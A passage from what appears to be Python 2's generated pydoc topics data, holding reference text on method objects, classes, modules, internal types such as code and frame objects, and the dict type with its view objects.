attribute is a user-defined function object, an unbound\n' ' user-defined method object, or a class method object. When ' 'the\n' ' attribute is a user-defined method object, a new method ' 'object\n' ' is only created if the class from which it is being retrieved ' 'is\n' ' the same as, or a derived class of, the class stored in the\n' ' original method object; otherwise, the original method object ' 'is\n' ' used as it is.\n' '\n' ' When a user-defined method object is created by retrieving a\n' ' user-defined function object from a class, its "im_self"\n' ' attribute is "None" and the method object is said to be ' 'unbound.\n' ' When one is created by retrieving a user-defined function ' 'object\n' ' from a class via one of its instances, its "im_self" ' 'attribute\n' ' is the instance, and the method object is said to be bound. ' 'In\n' ' either case, the new method\'s "im_class" attribute is the ' 'class\n' ' from which the retrieval takes place, and its "im_func"\n' ' attribute is the original function object.\n' '\n' ' When a user-defined method object is created by retrieving\n' ' another method object from a class or instance, the behaviour ' 'is\n' ' the same as for a function object, except that the "im_func"\n' ' attribute of the new instance is not the original method ' 'object\n' ' but its "im_func" attribute.\n' '\n' ' When a user-defined method object is created by retrieving a\n' ' class method object from a class or instance, its "im_self"\n' ' attribute is the class itself, and its "im_func" attribute ' 'is\n' ' the function object underlying the class method.\n' '\n' ' When an unbound user-defined method object is called, the\n' ' underlying function ("im_func") is called, with the ' 'restriction\n' ' that the first argument must be an instance of the proper ' 'class\n' ' ("im_class") or of a derived class thereof.\n' '\n' ' When a bound user-defined method object is called, the\n' ' underlying function ("im_func") is called, inserting the ' 'class\n' ' instance ("im_self") in front of the argument list. For\n' ' instance, when "C" is a class which contains a definition for ' 'a\n' ' function "f()", and "x" is an instance of "C", calling ' '"x.f(1)"\n' ' is equivalent to calling "C.f(x, 1)".\n' '\n' ' When a user-defined method object is derived from a class ' 'method\n' ' object, the "class instance" stored in "im_self" will ' 'actually\n' ' be the class itself, so that calling either "x.f(1)" or ' '"C.f(1)"\n' ' is equivalent to calling "f(C,1)" where "f" is the ' 'underlying\n' ' function.\n' '\n' ' Note that the transformation from function object to (unbound ' 'or\n' ' bound) method object happens each time the attribute is\n' ' retrieved from the class or instance. In some cases, a ' 'fruitful\n' ' optimization is to assign the attribute to a local variable ' 'and\n' ' call that local variable. Also notice that this ' 'transformation\n' ' only happens for user-defined functions; other callable ' 'objects\n' ' (and all non-callable objects) are retrieved without\n' ' transformation. It is also important to note that ' 'user-defined\n' ' functions which are attributes of a class instance are not\n' ' converted to bound methods; this *only* happens when the\n' ' function is an attribute of the class.\n' '\n' ' Generator functions\n' ' A function or method which uses the "yield" statement (see\n' ' section The yield statement) is called a *generator ' 'function*.\n' ' Such a function, when called, always returns an iterator ' 'object\n' ' which can be used to execute the body of the function: ' 'calling\n' ' the iterator\'s "next()" method will cause the function to\n' ' execute until it provides a value using the "yield" ' 'statement.\n' ' When the function executes a "return" statement or falls off ' 'the\n' ' end, a "StopIteration" exception is raised and the iterator ' 'will\n' ' have reached the end of the set of values to be returned.\n' '\n' ' Built-in functions\n' ' A built-in function object is a wrapper around a C function.\n' ' Examples of built-in functions are "len()" and "math.sin()"\n' ' ("math" is a standard built-in module). The number and type ' 'of\n' ' the arguments are determined by the C function. Special ' 'read-\n' ' only attributes: "__doc__" is the function\'s documentation\n' ' string, or "None" if unavailable; "__name__" is the ' "function's\n" ' name; "__self__" is set to "None" (but see the next item);\n' ' "__module__" is the name of the module the function was ' 'defined\n' ' in or "None" if unavailable.\n' '\n' ' Built-in methods\n' ' This is really a different disguise of a built-in function, ' 'this\n' ' time containing an object passed to the C function as an\n' ' implicit extra argument. An example of a built-in method is\n' ' "alist.append()", assuming *alist* is a list object. In this\n' ' case, the special read-only attribute "__self__" is set to ' 'the\n' ' object denoted by *alist*.\n' '\n' ' Class Types\n' ' Class types, or "new-style classes," are callable. These\n' ' objects normally act as factories for new instances of\n' ' themselves, but variations are possible for class types that\n' ' override "__new__()". The arguments of the call are passed ' 'to\n' ' "__new__()" and, in the typical case, to "__init__()" to\n' ' initialize the new instance.\n' '\n' ' Classic Classes\n' ' Class objects are described below. When a class object is\n' ' called, a new class instance (also described below) is ' 'created\n' " and returned. This implies a call to the class's " '"__init__()"\n' ' method if it has one. Any arguments are passed on to the\n' ' "__init__()" method. If there is no "__init__()" method, ' 'the\n' ' class must be called without arguments.\n' '\n' ' Class instances\n' ' Class instances are described below. Class instances are\n' ' callable only when the class has a "__call__()" method;\n' ' "x(arguments)" is a shorthand for "x.__call__(arguments)".\n' '\n' 'Modules\n' ' Modules are imported by the "import" statement (see section The\n' ' import statement). A module object has a namespace implemented ' 'by a\n' ' dictionary object (this is the dictionary referenced by the\n' ' func_globals attribute of functions defined in the module).\n' ' Attribute references are translated to lookups in this ' 'dictionary,\n' ' e.g., "m.x" is equivalent to "m.__dict__["x"]". A module object\n' ' does not contain the code object used to initialize the module\n' " (since it isn't needed once the initialization is done).\n" '\n' " Attribute assignment updates the module's namespace dictionary,\n" ' e.g., "m.x = 1" is equivalent to "m.__dict__["x"] = 1".\n' '\n' ' Special read-only attribute: "__dict__" is the module\'s ' 'namespace\n' ' as a dictionary object.\n' '\n' ' **CPython implementation detail:** Because of the way CPython\n' ' clears module dictionaries, the module dictionary will be ' 'cleared\n' ' when the module falls out of scope even if the dictionary still ' 'has\n' ' live references. To avoid this, copy the dictionary or keep ' 'the\n' ' module around while using its dictionary directly.\n' '\n' ' Predefined (writable) attributes: "__name__" is the module\'s ' 'name;\n' ' "__doc__" is the module\'s documentation string, or "None" if\n' ' unavailable; "__file__" is the pathname of the file from which ' 'the\n' ' module was loaded, if it was loaded from a file. The "__file__"\n' ' attribute is not present for C modules that are statically ' 'linked\n' ' into the interpreter; for extension modules loaded dynamically ' 'from\n' ' a shared library, it is the pathname of the shared library ' 'file.\n' '\n' 'Classes\n' ' Both class types (new-style classes) and class objects (old-\n' ' style/classic classes) are typically created by class ' 'definitions\n' ' (see section Class definitions). A class has a namespace\n' ' implemented by a dictionary object. Class attribute references ' 'are\n' ' translated to lookups in this dictionary, e.g., "C.x" is ' 'translated\n' ' to "C.__dict__["x"]" (although for new-style classes in ' 'particular\n' ' there are a number of hooks which allow for other means of ' 'locating\n' ' attributes). When the attribute name is not found there, the\n' ' attribute search continues in the base classes. For old-style\n' ' classes, the search is depth-first, left-to-right in the order ' 'of\n' ' occurrence in the base class list. New-style classes use the ' 'more\n' ' complex C3 method resolution order which behaves correctly even ' 'in\n' " the presence of 'diamond' inheritance structures where there " 'are\n' ' multiple inheritance paths leading back to a common ancestor.\n' ' Additional details on the C3 MRO used by new-style classes can ' 'be\n' ' found in the documentation accompanying the 2.3 release at\n' ' https://www.python.org/download/releases/2.3/mro/.\n' '\n' ' When a class attribute reference (for class "C", say) would ' 'yield a\n' ' user-defined function object or an unbound user-defined method\n' ' object whose associated class is either "C" or one of its base\n' ' classes, it is transformed into an unbound user-defined method\n' ' object whose "im_class" attribute is "C". When it would yield a\n' ' class method object, it is transformed into a bound ' 'user-defined\n' ' method object whose "im_self" attribute is "C". When it would\n' ' yield a static method object, it is transformed into the object\n' ' wrapped by the static method object. See section Implementing\n' ' Descriptors for another way in which attributes retrieved from ' 'a\n' ' class may differ from those actually contained in its ' '"__dict__"\n' ' (note that only new-style classes support descriptors).\n' '\n' " Class attribute assignments update the class's dictionary, " 'never\n' ' the dictionary of a base class.\n' '\n' ' A class object can be called (see above) to yield a class ' 'instance\n' ' (see below).\n' '\n' ' Special attributes: "__name__" is the class name; "__module__" ' 'is\n' ' the module name in which the class was defined; "__dict__" is ' 'the\n' ' dictionary containing the class\'s namespace; "__bases__" is a ' 'tuple\n' ' (possibly empty or a singleton) containing the base classes, in ' 'the\n' ' order of their occurrence in the base class list; "__doc__" is ' 'the\n' " class's documentation string, or None if undefined.\n" '\n' 'Class instances\n' ' A class instance is created by calling a class object (see ' 'above).\n' ' A class instance has a namespace implemented as a dictionary ' 'which\n' ' is the first place in which attribute references are searched.\n' " When an attribute is not found there, and the instance's class " 'has\n' ' an attribute by that name, the search continues with the class\n' ' attributes. If a class attribute is found that is a ' 'user-defined\n' ' function object or an unbound user-defined method object whose\n' ' associated class is the class (call it "C") of the instance for\n' ' which the attribute reference was initiated or one of its bases, ' 'it\n' ' is transformed into a bound user-defined method object whose\n' ' "im_class" attribute is "C" and whose "im_self" attribute is ' 'the\n' ' instance. Static method and class method objects are also\n' ' transformed, as if they had been retrieved from class "C"; see\n' ' above under "Classes". See section Implementing Descriptors for\n' ' another way in which attributes of a class retrieved via its\n' ' instances may differ from the objects actually stored in the\n' ' class\'s "__dict__". If no class attribute is found, and the\n' ' object\'s class has a "__getattr__()" method, that is called to\n' ' satisfy the lookup.\n' '\n' " Attribute assignments and deletions update the instance's\n" " dictionary, never a class's dictionary. If the class has a\n" ' "__setattr__()" or "__delattr__()" method, this is called ' 'instead\n' ' of updating the instance dictionary directly.\n' '\n' ' Class instances can pretend to be numbers, sequences, or ' 'mappings\n' ' if they have methods with certain special names. See section\n' ' Special method names.\n' '\n' ' Special attributes: "__dict__" is the attribute dictionary;\n' ' "__class__" is the instance\'s class.\n' '\n' 'Files\n' ' A file object represents an open file. File objects are created ' 'by\n' ' the "open()" built-in function, and also by "os.popen()",\n' ' "os.fdopen()", and the "makefile()" method of socket objects ' '(and\n' ' perhaps by other functions or methods provided by extension\n' ' modules). The objects "sys.stdin", "sys.stdout" and ' '"sys.stderr"\n' ' are initialized to file objects corresponding to the ' "interpreter's\n" ' standard input, output and error streams. See File Objects for\n' ' complete documentation of file objects.\n' '\n' 'Internal types\n' ' A few types used internally by the interpreter are exposed to ' 'the\n' ' user. Their definitions may change with future versions of the\n' ' interpreter, but they are mentioned here for completeness.\n' '\n' ' Code objects\n' ' Code objects represent *byte-compiled* executable Python ' 'code,\n' ' or *bytecode*. The difference between a code object and a\n' ' function object is that the function object contains an ' 'explicit\n' " reference to the function's globals (the module in which it " 'was\n' ' defined), while a code object contains no context; also the\n' ' default argument values are stored in the function object, ' 'not\n' ' in the code object (because they represent values calculated ' 'at\n' ' run-time). Unlike function objects, code objects are ' 'immutable\n' ' and contain no references (directly or indirectly) to ' 'mutable\n' ' objects.\n' '\n' ' Special read-only attributes: "co_name" gives the function ' 'name;\n' ' "co_argcount" is the number of positional arguments ' '(including\n' ' arguments with default values); "co_nlocals" is the number ' 'of\n' ' local variables used by the function (including arguments);\n' ' "co_varnames" is a tuple containing the names of the local\n' ' variables (starting with the argument names); "co_cellvars" ' 'is a\n' ' tuple containing the names of local variables that are\n' ' referenced by nested functions; "co_freevars" is a tuple\n' ' containing the names of free variables; "co_code" is a ' 'string\n' ' representing the sequence of bytecode instructions; ' '"co_consts"\n' ' is a tuple containing the literals used by the bytecode;\n' ' "co_names" is a tuple containing the names used by the ' 'bytecode;\n' ' "co_filename" is the filename from which the code was ' 'compiled;\n' ' "co_firstlineno" is the first line number of the function;\n' ' "co_lnotab" is a string encoding the mapping from bytecode\n' ' offsets to line numbers (for details see the source code of ' 'the\n' ' interpreter); "co_stacksize" is the required stack size\n' ' (including local variables); "co_flags" is an integer ' 'encoding a\n' ' number of flags for the interpreter.\n' '\n' ' The following flag bits are defined for "co_flags": bit ' '"0x04"\n' ' is set if the function uses the "*arguments" syntax to accept ' 'an\n' ' arbitrary number of positional arguments; bit "0x08" is set ' 'if\n' ' the function uses the "**keywords" syntax to accept ' 'arbitrary\n' ' keyword arguments; bit "0x20" is set if the function is a\n' ' generator.\n' '\n' ' Future feature declarations ("from __future__ import ' 'division")\n' ' also use bits in "co_flags" to indicate whether a code ' 'object\n' ' was compiled with a particular feature enabled: bit "0x2000" ' 'is\n' ' set if the function was compiled with future division ' 'enabled;\n' ' bits "0x10" and "0x1000" were used in earlier versions of\n' ' Python.\n' '\n' ' Other bits in "co_flags" are reserved for internal use.\n' '\n' ' If a code object represents a function, the first item in\n' ' "co_consts" is the documentation string of the function, or\n' ' "None" if undefined.\n' '\n' ' Frame objects\n' ' Frame objects represent execution frames. They may occur in\n' ' traceback objects (see below).\n' '\n' ' Special read-only attributes: "f_back" is to the previous ' 'stack\n' ' frame (towards the caller), or "None" if this is the bottom\n' ' stack frame; "f_code" is the code object being executed in ' 'this\n' ' frame; "f_locals" is the dictionary used to look up local\n' ' variables; "f_globals" is used for global variables;\n' ' "f_builtins" is used for built-in (intrinsic) names;\n' ' "f_restricted" is a flag indicating whether the function is\n' ' executing in restricted execution mode; "f_lasti" gives the\n' ' precise instruction (this is an index into the bytecode ' 'string\n' ' of the code object).\n' '\n' ' Special writable attributes: "f_trace", if not "None", is a\n' ' function called at the start of each source code line (this ' 'is\n' ' used by the debugger); "f_exc_type", "f_exc_value",\n' ' "f_exc_traceback" represent the last exception raised in the\n' ' parent frame provided another exception was ever raised in ' 'the\n' ' current frame (in all other cases they are None); "f_lineno" ' 'is\n' ' the current line number of the frame --- writing to this ' 'from\n' ' within a trace function jumps to the given line (only for ' 'the\n' ' bottom-most frame). A debugger can implement a Jump command\n' ' (aka Set Next Statement) by writing to f_lineno.\n' '\n' ' Traceback objects\n' ' Traceback objects represent a stack trace of an exception. ' 'A\n' ' traceback object is created when an exception occurs. When ' 'the\n' ' search for an exception handler unwinds the execution stack, ' 'at\n' ' each unwound level a traceback object is inserted in front ' 'of\n' ' the current traceback. When an exception handler is ' 'entered,\n' ' the stack trace is made available to the program. (See ' 'section\n' ' The try statement.) It is accessible as "sys.exc_traceback", ' 'and\n' ' also as the third item of the tuple returned by\n' ' "sys.exc_info()". The latter is the preferred interface, ' 'since\n' ' it works correctly when the program is using multiple ' 'threads.\n' ' When the program contains no suitable handler, the stack ' 'trace\n' ' is written (nicely formatted) to the standard error stream; ' 'if\n' ' the interpreter is interactive, it is also made available to ' 'the\n' ' user as "sys.last_traceback".\n' '\n' ' Special read-only attributes: "tb_next" is the next level in ' 'the\n' ' stack trace (towards the frame where the exception occurred), ' 'or\n' ' "None" if there is no next level; "tb_frame" points to the\n' ' execution frame of the current level; "tb_lineno" gives the ' 'line\n' ' number where the exception occurred; "tb_lasti" indicates ' 'the\n' ' precise instruction. The line number and last instruction ' 'in\n' ' the traceback may differ from the line number of its frame\n' ' object if the exception occurred in a "try" statement with ' 'no\n' ' matching except clause or with a finally clause.\n' '\n' ' Slice objects\n' ' Slice objects are used to represent slices when *extended ' 'slice\n' ' syntax* is used. This is a slice using two colons, or ' 'multiple\n' ' slices or ellipses separated by commas, e.g., "a[i:j:step]",\n' ' "a[i:j, k:l]", or "a[..., i:j]". They are also created by ' 'the\n' ' built-in "slice()" function.\n' '\n' ' Special read-only attributes: "start" is the lower bound; ' '"stop"\n' ' is the upper bound; "step" is the step value; each is "None" ' 'if\n' ' omitted. These attributes can have any type.\n' '\n' ' Slice objects support one method:\n' '\n' ' slice.indices(self, length)\n' '\n' ' This method takes a single integer argument *length* and\n' ' computes information about the extended slice that the ' 'slice\n' ' object would describe if applied to a sequence of ' '*length*\n' ' items. It returns a tuple of three integers; ' 'respectively\n' ' these are the *start* and *stop* indices and the *step* ' 'or\n' ' stride length of the slice. Missing or out-of-bounds ' 'indices\n' ' are handled in a manner consistent with regular slices.\n' '\n' ' New in version 2.3.\n' '\n' ' Static method objects\n' ' Static method objects provide a way of defeating the\n' ' transformation of function objects to method objects ' 'described\n' ' above. A static method object is a wrapper around any other\n' ' object, usually a user-defined method object. When a static\n' ' method object is retrieved from a class or a class instance, ' 'the\n' ' object actually returned is the wrapped object, which is not\n' ' subject to any further transformation. Static method objects ' 'are\n' ' not themselves callable, although the objects they wrap ' 'usually\n' ' are. Static method objects are created by the built-in\n' ' "staticmethod()" constructor.\n' '\n' ' Class method objects\n' ' A class method object, like a static method object, is a ' 'wrapper\n' ' around another object that alters the way in which that ' 'object\n' ' is retrieved from classes and class instances. The behaviour ' 'of\n' ' class method objects upon such retrieval is described above,\n' ' under "User-defined methods". Class method objects are ' 'created\n' ' by the built-in "classmethod()" constructor.\n', 'typesfunctions': '\n' 'Functions\n' '*********\n' '\n' 'Function objects are created by function definitions. The ' 'only\n' 'operation on a function object is to call it: ' '"func(argument-list)".\n' '\n' 'There are really two flavors of function objects: built-in ' 'functions\n' 'and user-defined functions. Both support the same ' 'operation (to call\n' 'the function), but the implementation is different, hence ' 'the\n' 'different object types.\n' '\n' 'See Function definitions for more information.\n', 'typesmapping': '\n' 'Mapping Types --- "dict"\n' '************************\n' '\n' 'A *mapping* object maps *hashable* values to arbitrary ' 'objects.\n' 'Mappings are mutable objects. There is currently only one ' 'standard\n' 'mapping type, the *dictionary*. (For other containers see ' 'the built\n' 'in "list", "set", and "tuple" classes, and the "collections" ' 'module.)\n' '\n' "A dictionary's keys are *almost* arbitrary values. Values " 'that are\n' 'not *hashable*, that is, values containing lists, ' 'dictionaries or\n' 'other mutable types (that are compared by value rather than ' 'by object\n' 'identity) may not be used as keys. Numeric types used for ' 'keys obey\n' 'the normal rules for numeric comparison: if two numbers ' 'compare equal\n' '(such as "1" and "1.0") then they can be used ' 'interchangeably to index\n' 'the same dictionary entry. (Note however, that since ' 'computers store\n' 'floating-point numbers as approximations it is usually ' 'unwise to use\n' 'them as dictionary keys.)\n' '\n' 'Dictionaries can be created by placing a comma-separated ' 'list of "key:\n' 'value" pairs within braces, for example: "{\'jack\': 4098, ' "'sjoerd':\n" '4127}" or "{4098: \'jack\', 4127: \'sjoerd\'}", or by the ' '"dict"\n' 'constructor.\n' '\n' 'class dict(**kwarg)\n' 'class dict(mapping, **kwarg)\n' 'class dict(iterable, **kwarg)\n' '\n' ' Return a new dictionary initialized from an optional ' 'positional\n' ' argument and a possibly empty set of keyword arguments.\n' '\n' ' If no positional argument is given, an empty dictionary ' 'is created.\n' ' If a positional argument is given and it is a mapping ' 'object, a\n' ' dictionary is created with the same key-value pairs as ' 'the mapping\n' ' object. Otherwise, the positional argument must be an ' '*iterable*\n' ' object. Each item in the iterable must itself be an ' 'iterable with\n' ' exactly two objects. The first object of each item ' 'becomes a key\n' ' in the new dictionary, and the second object the ' 'corresponding\n' ' value. If a key occurs more than once, the last value ' 'for that key\n' ' becomes the corresponding value in the new dictionary.\n' '\n' ' If keyword arguments are given, the keyword arguments and ' 'their\n' ' values are added to the dictionary created from the ' 'positional\n' ' argument. If a key being added is already present, the ' 'value from\n' ' the keyword argument replaces the value from the ' 'positional\n' ' argument.\n' '\n' ' To illustrate, the following examples all return a ' 'dictionary equal\n' ' to "{"one": 1, "two": 2, "three": 3}":\n' '\n' ' >>> a = dict(one=1, two=2, three=3)\n' " >>> b = {'one': 1, 'two': 2, 'three': 3}\n" " >>> c = dict(zip(['one', 'two', 'three'], [1, 2, 3]))\n" " >>> d = dict([('two', 2), ('one', 1), ('three', 3)])\n" " >>> e = dict({'three': 3, 'one': 1, 'two': 2})\n" ' >>> a == b == c == d == e\n' ' True\n' '\n' ' Providing keyword arguments as in the first example only ' 'works for\n' ' keys that are valid Python identifiers. Otherwise, any ' 'valid keys\n' ' can be used.\n' '\n' ' New in version 2.2.\n' '\n' ' Changed in version 2.3: Support for building a dictionary ' 'from\n' ' keyword arguments added.\n' '\n' ' These are the operations that dictionaries support (and ' 'therefore,\n' ' custom mapping types should support too):\n' '\n' ' len(d)\n' '\n' ' Return the number of items in the dictionary *d*.\n' '\n' ' d[key]\n' '\n' ' Return the item of *d* with key *key*. Raises a ' '"KeyError" if\n' ' *key* is not in the map.\n' '\n' ' If a subclass of dict defines a method "__missing__()" ' 'and *key*\n' ' is not present, the "d[key]" operation calls that ' 'method with\n' ' the key *key* as argument. The "d[key]" operation ' 'then returns\n' ' or raises whatever is returned or raised by the\n' ' "__missing__(key)" call. No other operations or ' 'methods invoke\n' ' "__missing__()". If "__missing__()" is not defined, ' '"KeyError"\n' ' is raised. "__missing__()" must be a method; it cannot ' 'be an\n' ' instance variable:\n' '\n' ' >>> class Counter(dict):\n' ' ... def __missing__(self, key):\n' ' ... return 0\n' ' >>> c = Counter()\n' " >>> c['red']\n" ' 0\n' " >>> c['red'] += 1\n" " >>> c['red']\n" ' 1\n' '\n' ' The example above shows part of the implementation of\n' ' "collections.Counter". A different "__missing__" ' 'method is used\n' ' by "collections.defaultdict".\n' '\n' ' New in version 2.5: Recognition of __missing__ methods ' 'of dict\n' ' subclasses.\n' '\n' ' d[key] = value\n' '\n' ' Set "d[key]" to *value*.\n' '\n' ' del d[key]\n' '\n' ' Remove "d[key]" from *d*. Raises a "KeyError" if ' '*key* is not\n' ' in the map.\n' '\n' ' key in d\n' '\n' ' Return "True" if *d* has a key *key*, else "False".\n' '\n' ' New in version 2.2.\n' '\n' ' key not in d\n' '\n' ' Equivalent to "not key in d".\n' '\n' ' New in version 2.2.\n' '\n' ' iter(d)\n' '\n' ' Return an iterator over the keys of the dictionary. ' 'This is a\n' ' shortcut for "iterkeys()".\n' '\n' ' clear()\n' '\n' ' Remove all items from the dictionary.\n' '\n' ' copy()\n' '\n' ' Return a shallow copy of the dictionary.\n' '\n' ' fromkeys(seq[, value])\n' '\n' ' Create a new dictionary with keys from *seq* and ' 'values set to\n' ' *value*.\n' '\n' ' "fromkeys()" is a class method that returns a new ' 'dictionary.\n' ' *value* defaults to "None".\n' '\n' ' New in version 2.3.\n' '\n' ' get(key[, default])\n' '\n' ' Return the value for *key* if *key* is in the ' 'dictionary, else\n' ' *default*. If *default* is not given, it defaults to ' '"None", so\n' ' that this method never raises a "KeyError".\n' '\n' ' has_key(key)\n' '\n' ' Test for the presence of *key* in the dictionary. ' '"has_key()"\n' ' is deprecated in favor of "key in d".\n' '\n' ' items()\n' '\n' ' Return a copy of the dictionary\'s list of "(key, ' 'value)" pairs.\n' '\n' ' **CPython implementation detail:** Keys and values are ' 'listed in\n' ' an arbitrary order which is non-random, varies across ' 'Python\n' " implementations, and depends on the dictionary's " 'history of\n' ' insertions and deletions.\n' '\n' ' If "items()", "keys()", "values()", "iteritems()", ' '"iterkeys()",\n' ' and "itervalues()" are called with no intervening ' 'modifications\n' ' to the dictionary, the lists will directly ' 'correspond. This\n' ' allows the creation of "(value, key)" pairs using ' '"zip()":\n' ' "pairs = zip(d.values(), d.keys())". The same ' 'relationship\n' ' holds for the "iterkeys()" and "itervalues()" methods: ' '"pairs =\n' ' zip(d.itervalues(), d.iterkeys())" provides the same ' 'value for\n' ' "pairs". Another way to create the same list is "pairs ' '= [(v, k)\n' ' for (k, v) in d.iteritems()]".\n' '\n' ' iteritems()\n' '\n' ' Return an iterator over the dictionary\'s "(key, ' 'value)" pairs.\n' ' See the note for "dict.items()".\n' '\n' ' Using "iteritems()" while adding or deleting entries ' 'in the\n' ' dictionary may raise a "RuntimeError" or fail to ' 'iterate over\n' ' all entries.\n' '\n' ' New in version 2.2.\n' '\n' ' iterkeys()\n' '\n' " Return an iterator over the dictionary's keys. See " 'the note for\n' ' "dict.items()".\n' '\n' ' Using "iterkeys()" while adding or deleting entries in ' 'the\n' ' dictionary may raise a "RuntimeError" or fail to ' 'iterate over\n' ' all entries.\n' '\n' ' New in version 2.2.\n' '\n' ' itervalues()\n' '\n' " Return an iterator over the dictionary's values. See " 'the note\n' ' for "dict.items()".\n' '\n' ' Using "itervalues()" while adding or deleting entries ' 'in the\n' ' dictionary may raise a "RuntimeError" or fail to ' 'iterate over\n' ' all entries.\n' '\n' ' New in version 2.2.\n' '\n' ' keys()\n' '\n' " Return a copy of the dictionary's list of keys. See " 'the note\n' ' for "dict.items()".\n' '\n' ' pop(key[, default])\n' '\n' ' If *key* is in the dictionary, remove it and return ' 'its value,\n' ' else return *default*. If *default* is not given and ' '*key* is\n' ' not in the dictionary, a "KeyError" is raised.\n' '\n' ' New in version 2.3.\n' '\n' ' popitem()\n' '\n' ' Remove and return an arbitrary "(key, value)" pair ' 'from the\n' ' dictionary.\n' '\n' ' "popitem()" is useful to destructively iterate over a\n' ' dictionary, as often used in set algorithms. If the ' 'dictionary\n' ' is empty, calling "popitem()" raises a "KeyError".\n' '\n' ' setdefault(key[, default])\n' '\n' ' If *key* is in the dictionary, return its value. If ' 'not, insert\n' ' *key* with a value of *default* and return *default*. ' '*default*\n' ' defaults to "None".\n' '\n' ' update([other])\n' '\n' ' Update the dictionary with the key/value pairs from ' '*other*,\n' ' overwriting existing keys. Return "None".\n' '\n' ' "update()" accepts either another dictionary object or ' 'an\n' ' iterable of key/value pairs (as tuples or other ' 'iterables of\n' ' length two). If keyword arguments are specified, the ' 'dictionary\n' ' is then updated with those key/value pairs: ' '"d.update(red=1,\n' ' blue=2)".\n' '\n' ' Changed in version 2.4: Allowed the argument to be an ' 'iterable\n' ' of key/value pairs and allowed keyword arguments.\n' '\n' ' values()\n' '\n' " Return a copy of the dictionary's list of values. See " 'the note\n' ' for "dict.items()".\n' '\n' ' viewitems()\n' '\n' ' Return a new view of the dictionary\'s items ("(key, ' 'value)"\n' ' pairs). See below for documentation of view objects.\n' '\n' ' New in version 2.7.\n' '\n' ' viewkeys()\n' '\n' " Return a new view of the dictionary's keys. See below " 'for\n' ' documentation of view objects.\n' '\n' ' New in version 2.7.\n' '\n' ' viewvalues()\n' '\n' " Return a new view of the dictionary's values. See " 'below for\n' ' documentation of view objects.\n' '\n' ' New in version 2.7.\n' '\n' ' Dictionaries compare equal if and only if they have the ' 'same "(key,\n' ' value)" pairs.\n' '\n' '\n' 'Dictionary view objects\n' '=======================\n' '\n' 'The objects returned by "dict.viewkeys()", ' '"dict.viewvalues()" and\n' '"dict.viewitems()" are *view objects*. They provide a ' 'dynamic view on\n' "the dictionary's entries, which means that when the " 'dictionary\n' 'changes, the view reflects these changes.\n' '\n' 'Dictionary views can be iterated over to yield their ' 'respective data,\n' 'and support membership tests:\n' '\n' 'len(dictview)\n' '\n' ' Return the number of entries in the dictionary.\n' '\n' 'iter(dictview)\n' '\n' ' Return an iterator over the keys, values or items ' '(represented as\n' ' tuples of "(key, value)") in the dictionary.\n' '\n' ' Keys and values are iterated over in an arbitrary order ' 'which is\n' ' non-random, varies across Python implementations, and ' 'depends on\n' " the dictionary's history of insertions and deletions. If " 'keys,\n' ' values and items views are iterated over with no ' 'intervening\n' ' modifications to the dictionary, the order of items will ' 'directly\n' ' correspond. This allows the creation of "(value, key)" ' 'pairs using\n' ' "zip()": "pairs = zip(d.values(), d.keys())". Another ' 'way to\n' ' create the same list is "pairs = [(v, k) for (k, v) in ' 'd.items()]".\n' '\n' ' Iterating views while adding or deleting entries in the ' 'dictionary\n' ' may raise a "RuntimeError" or fail to iterate over all ' 'entries.\n' '\n' 'x in dictview\n' '\n' ' Return "True" if *x* is in the underlying dictionary\'s ' 'keys, values\n' ' or items (in the latter case, *x* should be a "(key, ' 'value)"\n' ' tuple).\n' '\n' 'Keys views are set-like since their entries are unique and ' 'hashable.\n' 'If all values are hashable, so that (key, value) pairs are ' 'unique and\n' 'hashable, then the items view is also set-like. (Values ' 'views are not\n' 'treated as set-like since the entries are generally not ' 'unique.) Then\n' 'these set operations are available ("other" refers either to ' 'another\n' 'view or a set):\n' '\n' 'dictview & other\n' '\n' ' Return the intersection of the dictview and the other ' 'object as a\n' ' new set.\n' '\n' 'dictview | other\n' '\n' ' Return the union of the dictview and the other object as ' 'a new set.\n' '\n' 'dictview - other\n' '\n' ' Return the difference between the dictview and the other ' 'object\n' " (all elements in *dictview* that aren't in *other*) as a " 'new set.\n' '\n' 'dictview ^ other\n' '\n' ' Return the symmetric difference (all elements either in ' '*dictview*\n' ' or *other*, but not in both) of the dictview and the ' 'other object\n' ' as a new set.\n' '\n' 'An example of dictionary view usage:\n' '\n' " >>> dishes = {'eggs': 2, 'sausage': 1, 'bacon': 1, " "'spam': 500}\n" ' >>> keys = dishes.viewkeys()\n' ' >>> values = dishes.viewvalues()\n' '\n' ' >>> # iteration\n' ' >>> n = 0\n' ' >>> for val in values:\n' ' ... n += val\n' ' >>> print(n)\n' ' 504\n' '\n' ' >>> # keys and values are iterated over in the same ' 'order\n' ' >>> list(keys)\n' " ['eggs', 'bacon', 'sausage', 'spam']\n" ' >>> list(values)\n' ' [2, 1, 1, 500]\n' '\n' ' >>> # view objects are dynamic and reflect dict changes\n' " >>> del dishes['eggs']\n" " >>> del dishes['sausage']\n" ' >>> list(keys)\n' " ['spam', 'bacon']\n" '\n' ' >>> # set operations\n' " >>> keys & {'eggs', 'bacon', 'salad'}\n" " {'bacon'}\n", 'typesmethods': '\n' 'Methods\n' '*******\n' '\n' 'Methods are functions that are called using the attribute ' 'notation.\n' 'There are two flavors: built-in methods (such as "append()" ' 'on lists)\n' 'and class instance methods. Built-in methods are described ' 'with the\n' 'types that support them.\n' '\n' 'The implementation adds two special read-only attributes to ' 'class\n' 'instance methods: "m.im_self" is the object on which the ' 'method\n' 'operates, and "m.im_func" is the function implementing the ' 'method.\n' 'Calling "m(arg-1, arg-2, ..., arg-n)" is completely ' 'equivalent to\n' 'calling "m.im_func(m.im_self, arg-1, arg-2, ..., arg-n)".\n' '\n' 'Class instance methods are either *bound* or *unbound*, ' 'referring to\n' 'whether the method was accessed through an instance or a ' 'class,\n' 'respectively. When a method is unbound, its "im_self" ' 'attribute will\n' 'be "None" and if called, an explicit "self" object must be ' 'passed as\n' 'the first argument. In this case, "self" must be an ' 'instance of the\n' "unbound method's class (or a subclass of that class), " 'otherwise a\n' '"TypeError" is raised.\n' '\n' 'Like function objects, methods objects support getting ' 'arbitrary\n' 'attributes. However, since method attributes are actually ' 'stored on\n' 'the underlying function object ("meth.im_func"), setting ' 'method\n' 'attributes on either bound or unbound methods is ' 'disallowed.\n' 'Attempting to set an attribute on a method results in an\n' '"AttributeError" being raised. In order to set a method ' 'attribute,\n' 'you need to explicitly set it on the underlying function ' 'object:\n' '\n' ' >>> class C:\n' ' ... def method(self):\n' ' ... pass\n' ' ...\n' ' >>> c = C()\n' " >>> c.method.whoami = 'my name is method' # can't set on " 'the method\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in <module>\n' " AttributeError: 'instancemethod' object has no 